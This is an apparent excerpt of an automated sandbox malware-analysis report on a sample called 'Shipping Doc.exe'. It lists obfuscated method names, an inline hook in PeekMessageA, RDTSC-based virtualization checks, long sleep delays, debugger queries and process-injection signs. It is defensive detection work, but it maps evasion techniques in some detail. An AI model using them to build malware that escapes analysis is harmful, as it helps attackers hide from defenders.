Source: Shipping Doc.exe, VfaCLA2tkrd397ihoB/buZV27SgYVJ8wKY7Z0.cs	High entropy of concatenated method names: 'CMppZjWBMw', 'WSepPM9SAb', 'BJApjvbu0I', 'ReYpSqXGYT', 'hp3prsATrN', 'N3op30XIBP', 'YUZpyoUrkn', 'EV6p6ZDRrC', 'S0OpzLwnNq', 'uvNabGVwIQ'
Source: Shipping Doc.exe, UNAPpRk5a6XMif56PN/tbtYLjiE15X0m3NrV3.cs	High entropy of concatenated method names: 'DownJlYGxJ', 'xuxnPXJrTV', 'w3mnbXLFql', 'fTqnDGgSIY', 'eINnmEc12d', 'nKXnd3ROy7', 'awc4e3Q42f', 'BhB4klsGCM', 'g6x4c5BQkZ', '.ctor'
Source: Shipping Doc.exe, UiJUy4BuRoHLOAKf06/xXY9csuTjhbcI1BP2L.cs	High entropy of concatenated method names: '.ctor', 'Save', 'HAK5f06my', 'Load', 'HD3dcOlu8', 'L3tKrC2Wr', 'IdyxYvcVc', 'UiJGtlVLwBaQxjgBF6', 'PIkx4Wf1QZgiV6aU4i', 'Dmh9sciVAETbBXxfFa'
Source: Shipping Doc.exe, UOdyYvecVcmermsDhZ/RyGD3cgOlu803trC2W.cs	High entropy of concatenated method names: '.ctor', 'RHvjJZq4E', 'p2nSuK03D', 'vRg006sMX', 'za8rj6Xgs', 'lcY3ZFXvZ', 'SuJyVgV3w', 'K5l6Xpqre', 'aboznP1OR', 'wKa4b4MTS2'
Source: Shipping Doc.exe, lfBAw24wG7RaGl4BUSW/LdIBF34ft0aEOrSOpS7.cs	High entropy of concatenated method names: 'Dispose', 'ab0nKv0rYl', 'QfAnxS7FmM', 'KPJntrwakq', 'hrtnJqte2T', 'get_MinimumSize', 'set_MinimumSize', 'zaruECCxke', 'AUkuQwTOtd', 'kmkuL8FL2C'
Source: Shipping Doc.exe, xP7XZx4KUcy0rZpMq7p/C89e434dqTXWooX6OT2.cs	High entropy of concatenated method names: 'e0riOZyeQf', 'PdXiWMlD76', '.ctor', 'get_BackColor', 'set_BackColor', 'get_BackgroundImage', 'set_BackgroundImage', 'get_BackgroundImageLayout', 'set_BackgroundImageLayout', 'get_Font'
Source: Shipping Doc.exe, wUV9j84txMqsOMB0RNC/O8br1u4x3ZTxpBM3GKp.cs	High entropy of concatenated method names: '.ctor', 'MStqzWqX98', 'Bbn63OwGFH', 'BinijXg983', 'zWEiSMBU7I', 'GetEditControl', 'GetEditedValue', 'LoadValues', 'SetEditStyle', 'GetEditStyle'
Source: Shipping Doc.exe, m90oD71ZT6Wr9cSLC3/BCGZxMFmXU9h9JKBRA.cs	High entropy of concatenated method names: '.ctor', 'd4MMkZMC3a', 'jwDMcNsXnd', 'Gp5MqvWKfg', 'SyIMHvh4nd', 'hUNMDI3IfP', 'mDWuCAUyBYn6ulPCLkn', 'glMALsU9egpF9gq6VvY', 'BPhg4AU0cm0xPgAcOUP', 'A1LpkmUKxjoeRJhgj5v'
Source: Shipping Doc.exe, sKgaUY4su4YTKa6GuYl/zgNK5N4JjGAZFgAu99M.cs	High entropy of concatenated method names: '.ctor', 'UbQkbXvRlm', 'IODk4e1Qh2', 'csBkUTL3tc', 'khokVDYHrG', 'Gl8i6EIG8s', 'qyCiTn1nPR', 'FE7iz1aZDQ', 'gcBwMrofCMqEqIdiR6L', 'i3QNTaoieNlxFPGbQ4d'
Source: Shipping Doc.exe, I156H44Dv8rnIOySGfK/hltbY94HHwR3afLhEhf.cs	High entropy of concatenated method names: '.ctor', 'aLPlf5n4CH', 'tIqlwf7H6m', 'tZJlo0KBRb', 'cpflU40tFN', 'wk5lV1CuJF', 'kyhlMnlNeC', 'xLolpUglD3', 'N0WlaMcuXO', 'XbElCFHsrk'
Source: Shipping Doc.exe, iTAtM84qSuFr2hs51c1/llm9gs4ch4IcMcmGnvJ.cs	High entropy of concatenated method names: 'FIv9ZZdDqG', 'gQI9PDLDlN', 'q2H9mKTBvh', 'uM89jAIc2y', 'zL49SlfPPi', 'get_Multiline', 'set_Multiline', 'get_Text', 'set_Text', '.ctor'
Source: Shipping Doc.exe, aiLmWw4VnJDnSPTNJVN/XYryxx4U6BmknteXNOa.cs	High entropy of concatenated method names: '.ctor', 'ukj9woe4c6', 'Dfu9EiQsTa', 'NuW9A6sETI', 'InitializeEditingControl', 'get_EditType', 'get_ValueType', 'get_DefaultNewRowValue', 'MmH4btFKnt5dqxSDm2G', 'hZ9OUfFVGF3Eyyj8DxB'
Source: Shipping Doc.exe, BLop0K4E7l9d1bylJUy/zJBh6F4IacA7iyEpXZO.cs	High entropy of concatenated method names: 'L5eBi4Qigv', 'ixEBkeoTbq', 'FFgBo4KGaE', 'BSVBUenW6x', 'agMBMj6JFC', 'G76Bp97jPo', 'NEABaXP8gi', 'mb7BCbn9q3', 'oorB9rEwKt', 'zx5BYqnub6'
Source: Shipping Doc.exe, vNeJVt4AWwbHEvjgGer/LdlLQ14Qf610ZIAPrJw.cs	High entropy of concatenated method names: '.ctor', 'QppedwFCcs', 'qd6eKe7iLK', 'GI4etXfotQ', 'wxEeJ5n5Hk', 'get_Multiline', 'set_Multiline', 'fOLB0NPOGK', 'okIBFsEdfE', 'A7HB1qoYTX'
Source: Shipping Doc.exe, nKYoUB4oxKLGj4jvd63/aLgWyc44ofXur00lLx1.cs	High entropy of concatenated method names: 'VsAaQxSlAF', 'D09aAvsZj4', 'LmhaLRSl8M', 'okva5IYOyq', 'HKUad6KvCc', 'CAuaKRAFBD', 'J6paxwfEfU', 'iLlatruy0f', 'YF3aJVd6Ly', 'dX9aspur2U'

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE3

Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Shipping Doc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Shipping Doc.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 00000000032098E4 second address: 00000000032098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 0000000003209B5E second address: 0000000003209B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Shipping Doc.exe

Code function: 4_2_00409A90 rdtsc

4_2_00409A90

Source: C:\Users\user\Desktop\Shipping Doc.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Doc.exe TID: 5516	Thread sleep time: -39781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe TID: 6132	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3340	Thread sleep time: -38000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 1392	Thread sleep time: -45000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Shipping Doc.exe	Thread delayed: delay time: 39781			Jump to behavior
Source: C:\Users\user\Desktop\Shipping Doc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000006.00000000.280370116.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000006.00000000.273037707.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000006.00000000.280697838.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000006.00000000.280812513.00000000087D1000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000006.00000000.311184656.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000006.00000000.279908328.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Shipping Doc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Shipping Doc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Shipping Doc.exe

Code function: 4_2_00409A90 rdtsc

4_2_00409A90

Source: C:\Users\user\Desktop\Shipping Doc.exe

Code function: 4_2_0040ACD0 LdrLoadDll,

4_2_0040ACD0

Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05413540 mov eax, dword ptr fs:[00000030h]	15_2_05413540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C513A mov eax, dword ptr fs:[00000030h]	15_2_053C513A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C513A mov eax, dword ptr fs:[00000030h]	15_2_053C513A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C4D3B mov eax, dword ptr fs:[00000030h]	15_2_053C4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C4D3B mov eax, dword ptr fs:[00000030h]	15_2_053C4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C4D3B mov eax, dword ptr fs:[00000030h]	15_2_053C4D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539AD30 mov eax, dword ptr fs:[00000030h]	15_2_0539AD30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A3D34 mov eax, dword ptr fs:[00000030h]	15_2_053A3D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B4120 mov eax, dword ptr fs:[00000030h]	15_2_053B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B4120 mov eax, dword ptr fs:[00000030h]	15_2_053B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B4120 mov eax, dword ptr fs:[00000030h]	15_2_053B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B4120 mov eax, dword ptr fs:[00000030h]	15_2_053B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B4120 mov ecx, dword ptr fs:[00000030h]	15_2_053B4120
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05399100 mov eax, dword ptr fs:[00000030h]	15_2_05399100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05399100 mov eax, dword ptr fs:[00000030h]	15_2_05399100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05399100 mov eax, dword ptr fs:[00000030h]	15_2_05399100
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539B171 mov eax, dword ptr fs:[00000030h]	15_2_0539B171
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539B171 mov eax, dword ptr fs:[00000030h]	15_2_0539B171
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BC577 mov eax, dword ptr fs:[00000030h]	15_2_053BC577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BC577 mov eax, dword ptr fs:[00000030h]	15_2_053BC577
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539C962 mov eax, dword ptr fs:[00000030h]	15_2_0539C962
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B7D50 mov eax, dword ptr fs:[00000030h]	15_2_053B7D50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05468D34 mov eax, dword ptr fs:[00000030h]	15_2_05468D34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0541A537 mov eax, dword ptr fs:[00000030h]	15_2_0541A537
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D3D43 mov eax, dword ptr fs:[00000030h]	15_2_053D3D43
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BB944 mov eax, dword ptr fs:[00000030h]	15_2_053BB944
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BB944 mov eax, dword ptr fs:[00000030h]	15_2_053BB944
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C1DB5 mov eax, dword ptr fs:[00000030h]	15_2_053C1DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C1DB5 mov eax, dword ptr fs:[00000030h]	15_2_053C1DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C1DB5 mov eax, dword ptr fs:[00000030h]	15_2_053C1DB5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C61A0 mov eax, dword ptr fs:[00000030h]	15_2_053C61A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C61A0 mov eax, dword ptr fs:[00000030h]	15_2_053C61A0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053C35A1 mov eax, dword ptr fs:[00000030h]	15_2_053C35A1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CFD9B mov eax, dword ptr fs:[00000030h]	15_2_053CFD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CFD9B mov eax, dword ptr fs:[00000030h]	15_2_053CFD9B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_054241E8 mov eax, dword ptr fs:[00000030h]	15_2_054241E8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]	15_2_05392D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]	15_2_05392D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]	15_2_05392D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]	15_2_05392D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05392D8A mov eax, dword ptr fs:[00000030h]	15_2_05392D8A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05448DF1 mov eax, dword ptr fs:[00000030h]	15_2_05448DF1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CA185 mov eax, dword ptr fs:[00000030h]	15_2_053CA185
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053BC182 mov eax, dword ptr fs:[00000030h]	15_2_053BC182
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539B1E1 mov eax, dword ptr fs:[00000030h]	15_2_0539B1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539B1E1 mov eax, dword ptr fs:[00000030h]	15_2_0539B1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0539B1E1 mov eax, dword ptr fs:[00000030h]	15_2_0539B1E1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AD5E0 mov eax, dword ptr fs:[00000030h]	15_2_053AD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AD5E0 mov eax, dword ptr fs:[00000030h]	15_2_053AD5E0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_054169A6 mov eax, dword ptr fs:[00000030h]	15_2_054169A6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AB02A mov eax, dword ptr fs:[00000030h]	15_2_053AB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AB02A mov eax, dword ptr fs:[00000030h]	15_2_053AB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AB02A mov eax, dword ptr fs:[00000030h]	15_2_053AB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053AB02A mov eax, dword ptr fs:[00000030h]	15_2_053AB02A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CBC2C mov eax, dword ptr fs:[00000030h]	15_2_053CBC2C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542C450 mov eax, dword ptr fs:[00000030h]	15_2_0542C450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542C450 mov eax, dword ptr fs:[00000030h]	15_2_0542C450
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05461074 mov eax, dword ptr fs:[00000030h]	15_2_05461074
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05452073 mov eax, dword ptr fs:[00000030h]	15_2_05452073
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05451C06 mov eax, dword ptr fs:[00000030h]	15_2_05451C06
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0546740D mov eax, dword ptr fs:[00000030h]	15_2_0546740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0546740D mov eax, dword ptr fs:[00000030h]	15_2_0546740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0546740D mov eax, dword ptr fs:[00000030h]	15_2_0546740D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05416C0A mov eax, dword ptr fs:[00000030h]	15_2_05416C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05416C0A mov eax, dword ptr fs:[00000030h]	15_2_05416C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05416C0A mov eax, dword ptr fs:[00000030h]	15_2_05416C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05416C0A mov eax, dword ptr fs:[00000030h]	15_2_05416C0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05464015 mov eax, dword ptr fs:[00000030h]	15_2_05464015
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05464015 mov eax, dword ptr fs:[00000030h]	15_2_05464015
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B746D mov eax, dword ptr fs:[00000030h]	15_2_053B746D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05417016 mov eax, dword ptr fs:[00000030h]	15_2_05417016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05417016 mov eax, dword ptr fs:[00000030h]	15_2_05417016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05417016 mov eax, dword ptr fs:[00000030h]	15_2_05417016
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B0050 mov eax, dword ptr fs:[00000030h]	15_2_053B0050
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053B0050 mov eax, dword ptr fs:[00000030h]	15_2_053B0050
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CA44B mov eax, dword ptr fs:[00000030h]	15_2_053CA44B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CF0BF mov ecx, dword ptr fs:[00000030h]	15_2_053CF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CF0BF mov eax, dword ptr fs:[00000030h]	15_2_053CF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053CF0BF mov eax, dword ptr fs:[00000030h]	15_2_053CF0BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05468CD6 mov eax, dword ptr fs:[00000030h]	15_2_05468CD6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053D90AF mov eax, dword ptr fs:[00000030h]	15_2_053D90AF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0542B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542B8D0 mov ecx, dword ptr fs:[00000030h]	15_2_0542B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0542B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0542B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0542B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_0542B8D0 mov eax, dword ptr fs:[00000030h]	15_2_0542B8D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_053A849B mov eax, dword ptr fs:[00000030h]	15_2_053A849B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05416CF0 mov eax, dword ptr fs:[00000030h]	15_2_05416CF0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 15_2_05416CF0 mov eax, dword ptr fs:[00000030h]	15_2_05416CF0
